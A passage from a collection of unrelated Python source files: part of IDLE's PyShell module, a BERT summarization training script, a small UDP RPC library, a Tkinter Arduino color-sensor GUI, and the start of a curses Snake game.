return self.shell_title
COPYRIGHT = 'Type "copyright", "credits" or "license()" for more information.'
def begin(self):
self.resetoutput()
if use_subprocess:
nosub = ''
client = self.interp.start_subprocess()
if not client:
self.close()
return False
else:
nosub = '==== No Subprocess ===='
self.write('Python %s on %s\n%s\n%s' % (
sys.version, sys.platform, self.COPYRIGHT, nosub))
self.showprompt()
import Tkinter
Tkinter._default_root = None
return True
def readline(self):
save = self.reading
try:
self.reading = 1
self.top.mainloop()
finally:
self.reading = save
line = self.text.get('iomark', 'end-1c')
if len(line) == 0:
line = '\n'
if isinstance(line, unicode):
from idlelib import IOBinding
try:
line = line.encode(IOBinding.encoding)
except UnicodeError:
pass
self.resetoutput()
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
if self.endoffile:
self.endoffile = 0
line = ''
return line
def isatty(self):
return True
def cancel_callback(self, event=None):
try:
if self.text.compare('sel.first', '!=', 'sel.last'):
return
except:
pass
if not (self.executing or self.reading):
self.resetoutput()
self.interp.write('KeyboardInterrupt\n')
self.showprompt()
return 'break'
self.endoffile = 0
self.canceled = 1
if self.executing and self.interp.rpcclt:
if self.interp.getdebugger():
self.interp.restart_subprocess()
else:
self.interp.interrupt_subprocess()
if self.reading:
self.top.quit()
return 'break'
def eof_callback(self, event):
if self.executing and not self.reading:
return
if not (self.text.compare('iomark', '==', 'insert') and self.text.compare('insert', '==', 'end-1c')):
return
if not self.executing:
self.resetoutput()
self.close()
else:
self.canceled = 0
self.endoffile = 1
self.top.quit()
return 'break'
def linefeed_callback(self, event):
if self.reading:
self.text.insert('insert', '\n')
self.text.see('insert')
else:
self.newline_and_indent_event(event)
return 'break'
def enter_callback(self, event):
if self.executing and not self.reading:
return
try:
sel = self.text.get('sel.first', 'sel.last')
if sel:
if self.text.compare('sel.last', '<=', 'iomark'):
self.recall(sel, event)
return 'break'
except:
pass
if self.text.compare('insert', '<', 'iomark linestart'):
prev = self.text.tag_prevrange('stdin', 'insert')
if prev and self.text.compare('insert', '<', prev[1]):
self.recall(self.text.get(prev[0], prev[1]), event)
return 'break'
next = self.text.tag_nextrange('stdin', 'insert')
if next and self.text.compare('insert lineend', '>=', next[0]):
self.recall(self.text.get(next[0], next[1]), event)
return 'break'
indices = self.text.tag_nextrange('console', 'insert linestart')
if indices and self.text.compare(indices[0], '<=', 'insert linestart'):
self.recall(self.text.get(indices[1], 'insert lineend'), event)
else:
self.recall(self.text.get('insert linestart', 'insert lineend'), event)
return 'break'
if self.text.compare('insert', '<', 'iomark'):
self.text.mark_set('insert', 'iomark')
s = self.text.get('insert', 'end-1c')
if s and not s.strip():
self.text.delete('insert', 'end-1c')
if self.text.compare('insert', '<', 'end-1c linestart'):
self.newline_and_indent_event(event)
return 'break'
self.text.mark_set('insert', 'end-1c')
if self.reading:
self.text.insert('insert', '\n')
self.text.see('insert')
else:
self.newline_and_indent_event(event)
self.text.tag_add('stdin', 'iomark', 'end-1c')
self.text.update_idletasks()
if self.reading:
self.top.quit()
else:
self.runit()
return 'break'
def recall(self, s, event):
s = re.sub('^\\s*\\n', '', s)
s = re.sub('\\n\\s*$', '', s)
lines = s.split('\n')
self.text.undo_block_start()
try:
self.text.tag_remove('sel', '1.0', 'end')
self.text.mark_set('insert', 'end-1c')
prefix = self.text.get('insert linestart', 'insert')
if prefix.rstrip().endswith(':'):
self.newline_and_indent_event(event)
prefix = self.text.get('insert linestart', 'insert')
self.text.insert('insert', lines[0].strip())
if len(lines) > 1:
orig_base_indent = re.search('^([ \\t]*)', lines[0]).group(0)
new_base_indent = re.search('^([ \\t]*)', prefix).group(0)
for line in lines[1:]:
if line.startswith(orig_base_indent):
line = new_base_indent + line[len(orig_base_indent):]
self.text.insert('insert', '\n' + line.rstrip())
finally:
self.text.see('insert')
self.text.undo_block_stop()
def runit(self):
line = self.text.get('iomark', 'end-1c')
i = len(line)
while i > 0 and line[i - 1] in ' \t':
i = i - 1
if i > 0 and line[i - 1] == '\n':
i = i - 1
while i > 0 and line[i - 1] in ' \t':
i = i - 1
line = line[:i]
more = self.interp.runsource(line)
def open_stack_viewer(self, event=None):
if self.interp.rpcclt:
return self.interp.remote_stack_viewer()
try:
sys.last_traceback
except:
tkMessageBox.showerror('No stack trace', 'There is no stack trace yet.\n(sys.last_traceback is not defined)', master=self.text)
return
from idlelib.StackViewer import StackBrowser
sv = StackBrowser(self.root, self.flist)
def view_restart_mark(self, event=None):
self.text.see('iomark')
self.text.see('restart')
def restart_shell(self, event=None):
self.interp.restart_subprocess()
def showprompt(self):
self.resetoutput()
try:
s = str(sys.ps1)
except:
s = ''
self.console.write(s)
self.text.mark_set('insert', 'end-1c')
self.set_line_and_column()
self.io.reset_undo()
def resetoutput(self):
source = self.text.get('iomark', 'end-1c')
if self.history:
self.history.history_store(source)
if self.text.get('end-2c') != '\n':
self.text.insert('end-1c', '\n')
self.text.mark_set('iomark', 'end-1c')
self.set_line_and_column()
sys.stdout.softspace = 0
def write(self, s, tags=()):
try:
self.text.mark_gravity('iomark', 'right')
OutputWindow.write(self, s, tags, 'iomark')
self.text.mark_gravity('iomark', 'left')
except:
pass
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
class PseudoFile(object):
def __init__(self, shell, tags, encoding=None):
self.shell = shell
self.tags = tags
self.softspace = 0
self.encoding = encoding
def write(self, s):
self.shell.write(s, self.tags)
def writelines(self, lines):
for line in lines:
self.write(line)
def flush(self):
pass
def isatty(self):
return True
usage_msg = '\nUSAGE: idle [-deins] [-t title] [file]*\n idle [-dns] [-t title] (-c cmd | -r file) [arg]*\n idle [-dns] [-t title] - [arg]*\n\n -h print this help message and exit\n -n run IDLE without a subprocess (see Help/IDLE Help for details)\n\nThe following options will override the IDLE \'settings\' configuration:\n\n -e open an edit window\n -i open a shell window\n\nThe following options imply -i and will open a shell:\n\n -c cmd run the command in a shell, or\n -r file run script from file\n\n -d enable the debugger\n -s run $IDLESTARTUP or $PYTHONSTARTUP before anything else\n -t title set title of shell window\n\nA default edit window will be bypassed when -c, -r, or - are used.\n\n[arg]* are passed to the command (-c) or script (-r) in sys.argv[1:].\n\nExamples:\n\nidle\n Open an edit window or shell depending on IDLE\'s configuration.\n\nidle foo.py foobar.py\n Edit the files, also open a shell if configured to start with shell.\n\nidle -est "Baz" foo.py\n Run $IDLESTARTUP or $PYTHONSTARTUP, edit foo.py, and open a shell\n window with the title "Baz".\n\nidle -c "import sys; print sys.argv" "foo"\n Open a shell window and run the command, passing "-c" in sys.argv[0]\n and "foo" in sys.argv[1].\n\nidle -d -s -r foo.py "Hello World"\n Open a shell window, run a startup script, enable the debugger, and\n run foo.py, passing "foo.py" in sys.argv[0] and "Hello World" in\n sys.argv[1].\n\necho "import sys; print sys.argv" | idle - "foobar"\n Open a shell window, run the script piped in, passing \'\' in sys.argv[0]\n and "foobar" in sys.argv[1].\n'
def main():
global root
global flist
global use_subprocess
use_subprocess = True
enable_shell = True
enable_edit = False
debug = False
cmd = None
script = None
startup = False
try:
opts, args = getopt.getopt(sys.argv[1:], 'c:deihnr:st:')
except getopt.error as msg:
sys.stderr.write('Error: %s\n' % str(msg))
sys.stderr.write(usage_msg)
sys.exit(2)
for o, a in opts:
if o == '-c':
cmd = a
enable_shell = True
if o == '-d':
debug = True
enable_shell = True
if o == '-e':
enable_edit = True
enable_shell = False
if o == '-h':
sys.stdout.write(usage_msg)
sys.exit()
if o == '-i':
enable_shell = True
if o == '-n':
use_subprocess = False
if o == '-r':
script = a
if os.path.isfile(script):
pass
else:
print 'No script file: ', script
sys.exit()
enable_shell = True
if o == '-s':
startup = True
enable_shell = True
if o == '-t':
PyShell.shell_title = a
enable_shell = True
if args and args[0] == '-':
cmd = sys.stdin.read()
enable_shell = True
for i in range(len(sys.path)):
sys.path[i] = os.path.abspath(sys.path[i])
if args and args[0] == '-':
sys.argv = [
''] + args[1:]
elif cmd:
sys.argv = [
'-c'] + args
elif script:
sys.argv = [
script] + args
elif args:
enable_edit = True
pathx = []
for filename in args:
pathx.append(os.path.dirname(filename))
for dir in pathx:
dir = os.path.abspath(dir)
if dir not in sys.path:
sys.path.insert(0, dir)
else:
dir = os.getcwd()
if dir not in sys.path:
sys.path.insert(0, dir)
edit_start = idleConf.GetOption('main', 'General', 'editor-on-startup', type='bool')
enable_edit = enable_edit or edit_start
root = Tk(className='Idle')
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
macosxSupport.setupApp(root, flist)
if enable_edit:
if not (cmd or script):
for filename in args:
flist.open(filename)
if not args:
flist.new()
if enable_shell:
shell = flist.open_shell()
if not shell:
return
if macosxSupport.runningAsOSXApp() and flist.dict:
shell.top.lower()
shell = flist.pyshell
if debug:
shell.open_debugger()
if startup:
filename = os.environ.get('IDLESTARTUP') or os.environ.get('PYTHONSTARTUP')
if filename and os.path.isfile(filename):
shell.interp.execfile(filename)
if shell and cmd or script:
shell.interp.runcommand('if 1:\n import sys as _sys\n _sys.argv = %r\n del _sys\n \n' % (sys.argv,))
if cmd:
shell.interp.execsource(cmd)
elif script:
shell.interp.prepend_syspath(script)
shell.interp.execfile(script)
tkversionwarning = macosxSupport.tkVersionWarning(root)
if tkversionwarning:
shell.interp.runcommand(''.join(("print('", tkversionwarning, "')")))
root.mainloop()
root.destroy()
return
if __name__ == '__main__':
sys.modules['PyShell'] = sys.modules['__main__']
main()
|
z_train_abstractive.py
|
#!/usr/bin/env python
"""
Main training workflow
"""
from __future__ import division
import argparse
import glob
import os
import random
import signal
import time
import torch
from pytorch_transformers import BertTokenizer
import distributed
from models import data_loader, model_builder
from models.data_loader import load_dataset
COPY=False
if COPY:
from models.loss_copy import abs_loss
else:
from models.loss import abs_loss
from models.model_builder import Z_AbsSummarizer
from models.predictor import build_predictor
from models.z_trainer import build_trainer
from others.logging import logger, init_logger
model_flags = ['hidden_size', 'ff_size', 'heads', 'emb_size', 'enc_layers', 'enc_hidden_size', 'enc_ff_size',
'dec_layers', 'dec_hidden_size', 'dec_ff_size', 'encoder', 'ff_actv', 'use_interval']
def str2bool(v):
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
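# Illustrative sketch (not part of this script): str2bool above is the usual
# argparse "type=" converter for boolean flags. The flag name below is only an
# example; the real argument definitions live in the training entry point.
def _str2bool_usage_example():
    parser = argparse.ArgumentParser()
    parser.add_argument("-use_bert_emb", type=str2bool, nargs='?', const=True, default=False)
    return parser.parse_args(["-use_bert_emb", "true"]).use_bert_emb  # -> True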
def train_abs_multi(args):
""" Spawns 1 process per GPU """
init_logger()
nb_gpu = args.world_size
mp = torch.multiprocessing.get_context('spawn')
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Train with multiprocessing.
procs = []
for i in range(nb_gpu):
device_id = i
procs.append(mp.Process(target=run, args=(args,
device_id, error_queue,), daemon=True))
procs[i].start()
logger.info(" Starting process pid: %d " % procs[i].pid)
error_handler.add_child(procs[i].pid)
for p in procs:
p.join()
def run(args, device_id, error_queue):
""" run process """
setattr(args, 'gpu_ranks', [int(i) for i in args.gpu_ranks])
try:
gpu_rank = distributed.multi_init(device_id, args.world_size, args.gpu_ranks)
print('gpu_rank %d' % gpu_rank)
if gpu_rank != args.gpu_ranks[device_id]:
raise AssertionError("An error occurred in \
Distributed initialization")
train_abs_single(args, device_id)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((args.gpu_ranks[device_id], traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
""" init error handler """
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(
target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
""" error handler """
self.children_pids.append(pid)
def error_listener(self):
""" error listener """
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
""" signal handler """
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = """\n\n-- Tracebacks above this line can probably
be ignored --\n\n"""
msg += original_trace
raise Exception(msg)
def validate_abs(args, device_id):
timestep = 0
if (args.test_all):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
xent_lst = []
for i, cp in enumerate(cp_files):
step = int(cp.split('.')[-2].split('_')[-1])
if (args.test_start_from != -1 and step < args.test_start_from):
xent_lst.append((1e6, cp))
continue
xent = validate(args, device_id, cp, step)
xent_lst.append((xent, cp))
max_step = xent_lst.index(min(xent_lst))
if (i - max_step > 10):
break
xent_lst = sorted(xent_lst, key=lambda x: x[0])[:5]
logger.info('PPL %s' % str(xent_lst))
for xent, cp in xent_lst:
step = int(cp.split('.')[-2].split('_')[-1])
test_abs(args, device_id, cp, step)
else:
while (True):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (not os.path.getsize(cp) > 0):
time.sleep(60)
continue
if (time_of_cp > timestep):
timestep = time_of_cp
step = int(cp.split('.')[-2].split('_')[-1])
validate(args, device_id, cp, step)
test_abs(args, device_id, cp, step)
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (time_of_cp > timestep):
continue
else:
time.sleep(300)
def validate(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
model = Z_AbsSummarizer(args, device, checkpoint)
model.eval()
valid_iter = data_loader.Dataloader(args, load_dataset(args, 'valid', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=False)
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True, cache_dir=args.temp_dir)
symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
if COPY:
valid_loss = abs_loss(model.generator, symbols, model.vocab_size, train=False, device=device, copy_generator=model.copy_generator)
else:
valid_loss = abs_loss(model.generator, symbols, model.vocab_size, train=False, device=device)
trainer = build_trainer(args, device_id, model, None, valid_loss)
stats = trainer.validate(valid_iter, step)
return stats.xent()
def test_abs(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
model = Z_AbsSummarizer(args, device, checkpoint)
model.eval()
test_iter = data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.test_batch_size, device,
shuffle=False, is_test=True)
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True, cache_dir=args.temp_dir)
symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
predictor = build_predictor(args, tokenizer, symbols, model, logger)
predictor.translate(test_iter, step)
def test_text_abs(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
model = Z_AbsSummarizer(args, device, checkpoint)
model.eval()
test_iter = data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.test_batch_size, device,
shuffle=False, is_test=True)
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True, cache_dir=args.temp_dir)
symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
predictor = build_predictor(args, tokenizer, symbols, model, logger)
predictor.translate(test_iter, step)
def baseline(args, cal_lead=False, cal_oracle=False):
test_iter = data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.batch_size, 'cpu',
shuffle=False, is_test=True)
trainer = build_trainer(args, '-1', None, None, None)
#
if (cal_lead):
trainer.test(test_iter, 0, cal_lead=True)
elif (cal_oracle):
trainer.test(test_iter, 0, cal_oracle=True)
def train_abs(args, device_id):
if (args.world_size > 1):
train_abs_multi(args)
else:
train_abs_single(args, device_id)
def train_abs_single(args, device_id):
init_logger(args.log_file)
logger.info(str(args))
device = "cpu" if args.visible_gpus == '-1' else "cuda"
logger.info('Device ID %d' % device_id)
logger.info('Device %s' % device)
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
if device_id >= 0:
torch.cuda.set_device(device_id)
torch.cuda.manual_seed(args.seed)
if args.train_from != '':
logger.info('Loading checkpoint from %s' % args.train_from)
checkpoint = torch.load(args.train_from,
map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
else:
checkpoint = None
if (args.load_from_extractive != ''):
logger.info('Loading bert from extractive model %s' % args.load_from_extractive)
bert_from_extractive = torch.load(args.load_from_extractive, map_location=lambda storage, loc: storage)
bert_from_extractive = bert_from_extractive['model']
else:
bert_from_extractive = None
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
def train_iter_fct():
return data_loader.Dataloader(args, load_dataset(args, 'train', shuffle=True), args.batch_size, device,
shuffle=True, is_test=False)
model = Z_AbsSummarizer(args, device, checkpoint, bert_from_extractive)
if (args.sep_optim):
optim_bert = model_builder.build_optim_bert(args, model, checkpoint)
optim_dec = model_builder.build_optim_dec(args, model, checkpoint)
optim = [optim_bert, optim_dec]
else:
optim = [model_builder.build_optim(args, model, checkpoint)]
logger.info(model)
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True, cache_dir=args.temp_dir)
symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
if COPY:
train_loss = abs_loss(model.generator, symbols, model.vocab_size, device, train=True,
label_smoothing=args.label_smoothing, copy_generator=model.copy_generator)
else:
train_loss = abs_loss(model.generator, symbols, model.vocab_size, device, train=True,
label_smoothing=args.label_smoothing)
trainer = build_trainer(args, device_id, model, optim, train_loss)
trainer.train(train_iter_fct, args.train_steps)
|
srpc.py
|
from random import randint
import socket
from threading import Thread, Timer, Event
#SRPC imports
from connection import Connection
from payload import Payload, ConnectPayload
from srpcTypes import Service, Endpoint
from srpcDefs import SRPCDef, Command
class SRPC(object):
"""A simple RPC library for connecting to and offering services"""
def __init__(self, port = 0):
super(SRPC, self).__init__()
self.port = port # default to ephemeral port assigned by OS
self.sock = socket.socket(socket.AF_INET,
socket.SOCK_DGRAM)
self.sock.bind(('', port)) # Bind to all interfaces on port
self.port = self.sock.getsockname()[1]
self.connectionTable = {}
self.serviceTable = {}
self.seed = randint(0, 32767)
self.counter = 1
self.stop = Event() # Thread-safe Stop event for exiting threads
self.readerThread = Thread(target=self.reader, args=(self.stop,))
self.readerThread.start()
self.cleanerThread = Timer(0.020, self.cleaner, args=(self.stop,))
self.cleanerThread.start()
def details(self):
"""Returns IP and port socket is bound to """
return self.sock.getsockname()
def close(self):
"""Close down the srpc system"""
self.stop.set() # Alert threads to stop using stop event
# Send empty packet to readerThread to break it out of blocking recv
        self.sock.sendto(b"", self.sock.getsockname())
self.readerThread.join()
self.cleanerThread.join()
self.sock.close()
def _getNewSubport(self):
"""Private method for getting a new subport number"""
self.counter += 1
if self.counter > 32767:
self.counter = 1
return (self.seed & 0xFFFF) << 16 | self.counter
def connect(self, host, port, serviceName):
"""Connect to a service offered at host:port
Returns connection if successful,
otherwise, None
"""
address = socket.gethostbyname(host)
endpoint = Endpoint(address, port, self._getNewSubport())
connection = Connection(self.sock, endpoint, None)
self.connectionTable[endpoint] = connection
if connection.connect(serviceName):
return connection
else:
return None
def disconnect(self, connection):
"""Disconnect an existing connection, notifying the remote client"""
connection.disconnect()
self.connectionTable.pop(connection.source)
def offerService(self, serviceName):
"""Offer a service (serviceName) to other remote clients"""
service = Service(serviceName)
self.serviceTable[serviceName] = service
return service
def lookupService(self, serviceName):
"""Lookup and return an offered service, if it exists"""
return self.serviceTable.get(serviceName)
def reader(self, stop_event):
"""Reads packets from socket and updates connections
until stop_event is received
"""
while not stop_event.is_set():
data, addr = self.sock.recvfrom(SRPCDef.FRAGMENT_SIZE * 10)
if len(data) == 0:
break
payload = Payload(buffer=data)
endpoint = Endpoint(addr[0], addr[1], payload.subport)
connection = self.connectionTable.get(endpoint)
if connection is not None: #Found a valid connection record
connection.commandReceived(payload)
elif payload.command == Command.CONNECT:
payload = ConnectPayload(buffer=data)
service = self.serviceTable.get(payload.serviceName)
if service is not None:
connection = Connection(self.sock, endpoint, service)
self.connectionTable[endpoint] = connection
connection.commandReceived(payload)
#else: invalid connection + command request
def cleaner(self, stop_event):
if stop_event.is_set():
return
        # iterate over a snapshot so timed-out entries can be popped while looping
        for endpoint in list(self.connectionTable.keys()):
connection = self.connectionTable[endpoint]
connection.checkStatus()
if connection.isTimedOut():
self.connectionTable.pop(endpoint)
self.cleanerThread = Timer(0.020, self.cleaner, args=(self.stop,))
self.cleanerThread.start()
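# Illustrative usage sketch (not part of the library): one SRPC instance offers a
# service while a second connects to it over loopback. The service name and port
# are arbitrary, and anything beyond connect/disconnect depends on the Connection
# API defined in connection.py.
def _srpc_example():
    server = SRPC(port=5001)
    server.offerService("echo")
    client = SRPC()  # ephemeral port chosen by the OS
    conn = client.connect("localhost", 5001, "echo")
    if conn is not None:
        client.disconnect(conn)
    client.close()
    server.close()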
|
arduinoLink.py
|
import serial
import tkinter as tk
import os
from threading import Thread
from serial import *
last_received = ''
def receiving(ser):
    # Continuously read from the serial port and keep the most recent complete
    # line in last_received. (The GUI below reads the port directly instead.)
    global last_received
    buffer = ''
    while True:
        # read() returns bytes under pyserial/Python 3, so decode before mixing
        # with the str buffer; request at least one byte so the loop blocks politely
        buffer += ser.read(ser.inWaiting() or 1).decode('ascii', errors='ignore')
        if '\n' in buffer:
            last_received, buffer = buffer.split('\n')[-2:]
# NOTE: starting the reader thread here raises a NameError (`ser` is only opened
# further below), and a background readline() loop would also compete with
# readColor() for the same serial data, so the call is left disabled.
# Thread(target=receiving, args=(ser,)).start()
def readColor():
#Initial Box Color
c="black"
#Initial Text Color
t="Black"
ser.flushInput()
ser.write(bytes("l","ASCII"))
x = 0
while x<1:
arduino = ser.readline().decode('ASCII')
arduino2 = ser.readline().decode('ASCII')
arduinoList = list(arduino)
arduinoList2 = list(arduino2)
arduinoData = "1"
arduinoData2 = "1"
        # Lines containing 'D' are the "... Color Detected" messages; the other
        # line carries the raw sensor reading.
        z=0
        for s in arduinoList:
            if s == 'D':
                z=1
        if z == 1:
            arduinoData2 = arduino
        else:
            arduinoData = arduino
        q=0
        for ch in arduinoList2:
            if ch == 'D':
                q=1
        if q == 1:
            arduinoData2 = arduino2
        else:
            arduinoData = arduino2
x=x+1
print(arduinoData)
rgbList = arduinoData2.split(',')
print(rgbList)
brown = "#993300"
purple = "#6a0dad"
gray = "#bebebe"
orange = "#ff6600"
pink = "#ffc0cb"
for n in rgbList:
if n=='Black Color Detected\r\n':
c="black"
t="Black"
elif n=='Blue Color Detected\r\n':
c="blue"
t="Blue"
elif n=='Red Color Detected\r\n':
c="red"
t="Red"
elif n=='Brown Color Detected\r\n':
c=brown
t="Brown"
elif n=='Purple Color Detected\r\n':
c=purple
t="Purple"
elif n=='Green Color Detected\r\n':
c="green"
t="Green"
elif n=='Gray Color Detected\r\n':
c=gray
t="Gray"
elif n=='Orange Color Detected\r\n':
c=orange
t="Orange"
elif n=='Yellow Color Detected\r\n':
c="yellow"
t="Yellow"
elif n=='Pink Color Detected\r\n':
c=pink
t="Pink"
elif n=='White Color Detected\r\n':
c="white"
t="White"
    canvas.itemconfig(rec, fill=c)
    canvas.itemconfig(CText, fill=c, text=t)
    canvas.update()
ser=serial.Serial('com9',baudrate = 9600)
win = tk.Tk()
win.title("Computer Organization and Architecture Honors: Color Sensor")
win.geometry("800x800+500+100")
#Set window resizable to false.
win.resizable(width=False,height=False)
#win.iconbitmap("11-Colors.ico")
win.iconphoto(False, tk.PhotoImage(file="11-Colors.png"))
canvas=tk.Canvas(win,width=1940, height=1220, bg = "blanchedalmond")
TText=canvas.create_text(400,50,fill="coral",font="helvetica 42 bold",text="Adafruit Color Sensor")
rec=canvas.create_rectangle(250, 150, 550, 450, fill="black")
CText=canvas.create_text(400,500,fill="black",font="helvetica 35 bold",text="No Color Detected")
canvas.pack(fill = tk.BOTH, expand = tk.YES)
bt1 = tk.Button(text="Detect Color",command=readColor, bg="brown", fg="white", font=("helvetica", 22, "bold"))
canvas.create_window(400, 600, window=bt1)
win.mainloop()
|
Snake.py
|
# Author: André Fonteles
# This game does not run on windows due to the lack of
# support for the curses library
import atexit
import random
import curses
import time
import threading
import os
# An IOController controls the input (keyboard) and output
# (console) of the game
class IOController():
    # TODO: curses is being shared between the two threads and may
    # lead to a race condition. This should be fixed later
KEY_UP = curses.KEY_UP
KEY_DOWN = curses.KEY_DOWN
KEY_LEFT = curses.KEY_LEFT
KEY_RIGHT = curses.KEY_RIGHT
KEY_Q = ord('q')
KEY_A = ord('a')
def __init__(self):
self.__stdscr = curses.initscr()
curses.cbreak()
curses.noecho()
self.__stdscr.keypad(1)
self.__last_key = self.KEY_RIGHT
self.__key_lock = threading.Lock() # Create a lock to prevent race condition on __last_key
# Start thread that continuously reads user's input
thread = threading.Thread(target = self.__read_key)
thread.start()
# Outputs the game_array to the console
def print(self, game_array, score, dead):
self.__stdscr.addstr(1, len(game_array[0]) + 1, "Score:" + str(score))
for y in range(0, len(game_array)):
line = ""
for x in range(0, len(game_array[y])):
line += game_array[y][x]
self.__stdscr.addstr(y, 0, line)
# If dead, display dead message
if(dead):
msg_y = len(game_array)//2
msg_x = len(game_array[0])//4
self.__stdscr.addstr(msg_y-1, msg_x, "You are dead")
# self.__stdscr.addstr(msg_y+1, len(game_array[0]) + 1, "Press \"a\" to play again")
self.__stdscr.addstr(msg_y+2, len(game_array[0]) + 1, "Press \"q\" to quit")
self.__stdscr.refresh()
# Returns the last key pressed by the user in terms of
# the constants InOutputer.KEY_UP, InOutputer.KEY_DOWN
# InOutputer.KEY_LEFT and InOutputer.KEY_RIGHT
def get_last_key(self):
self.__key_lock.acquire()
key = self.__last_key
self.__key_lock.release()
return key
# Used in a separate thread to constantly
# update the last direction key input by
# the user
    def __read_key(self):
        key = None
        while(key != self.KEY_Q): # Continue as long as key is not 'q'
            key = self.__stdscr.getch()
            if key == curses.KEY_UP:
                key = self.KEY_UP
            elif key == curses.KEY_DOWN:
                key = self.KEY_DOWN
            elif key == curses.KEY_LEFT:
                key = self.KEY_LEFT
            elif key == curses.KEY_RIGHT:
                key = self.KEY_RIGHT
            elif key == self.KEY_Q:
                key = self.KEY_Q
            elif key == self.KEY_A:
                key = self.KEY_A
            if(key):
                # Only hold the lock while touching the shared __last_key; the
                # original acquire/release pattern could release an unheld lock.
                self.__key_lock.acquire()
                self.__last_key = key
                self.__key_lock.release()
# End terminal curses mode.
def close(self):
curses.endwin()
# A MazeMap represents the maze where the snake is in
class MazeMap():
BG_CHAR = "."
def __init__(self, width, height):
self.__width = width
self.__height = height
self.generate_maze()
# Generate a bidimentional array representing the maze
def generate_maze(self):
self.__maze_array = []
for y in range(0, self.__height):
self.__maze_array.append([])
for x in range(0, self.__width):
self.__maze_array[y].append(self.BG_CHAR)
return self.__maze_array
# This class is used to instantiate the snake.
class Snake:
SNAKE_CHAR = "*"
DIRECTION_UP = "top"
DIRECTION_DOWN = "down"
DIRECTION_RIGHT = "right"
DIRECTION_LEFT = "left"
def __init__(self, game_width, game_height):
self.__game_width = game_width
self.__game_height = game_height
self.__generate_snake_array()
# Configure whether the snake is dead or not
self.__dead = False
# Configure snake to start moving rightwards
self.__direction = self.DIRECTION_RIGHT
    # Returns a point (x, y) representing the head's position
    def get_head_pos(self):
        return self.__snake_array[-1]
    # Returns an array of points (x, y) representing the snake's body
    def get_snake_array(self):
return self.__snake_array
# Generates an array of points (x, y) representing the snake's body
def __generate_snake_array(self):
init_size = 4
init_x = self.__game_width // 2
init_y = self.__game_height - 2
self.__snake_array = []
for x in range(init_x - init_size, init_x):
self.__snake_array.append((x, init_y))
self._potential_growth = (init_x - init_size - 1, init_y)
# Adds the snake to the game_array
def add_itself(self, game_array):
for point in self.__snake_array:
game_array[point[1]][point[0]] = self.SNAKE_CHAR
# Moves the snake towards *neighboring* point (x, y)
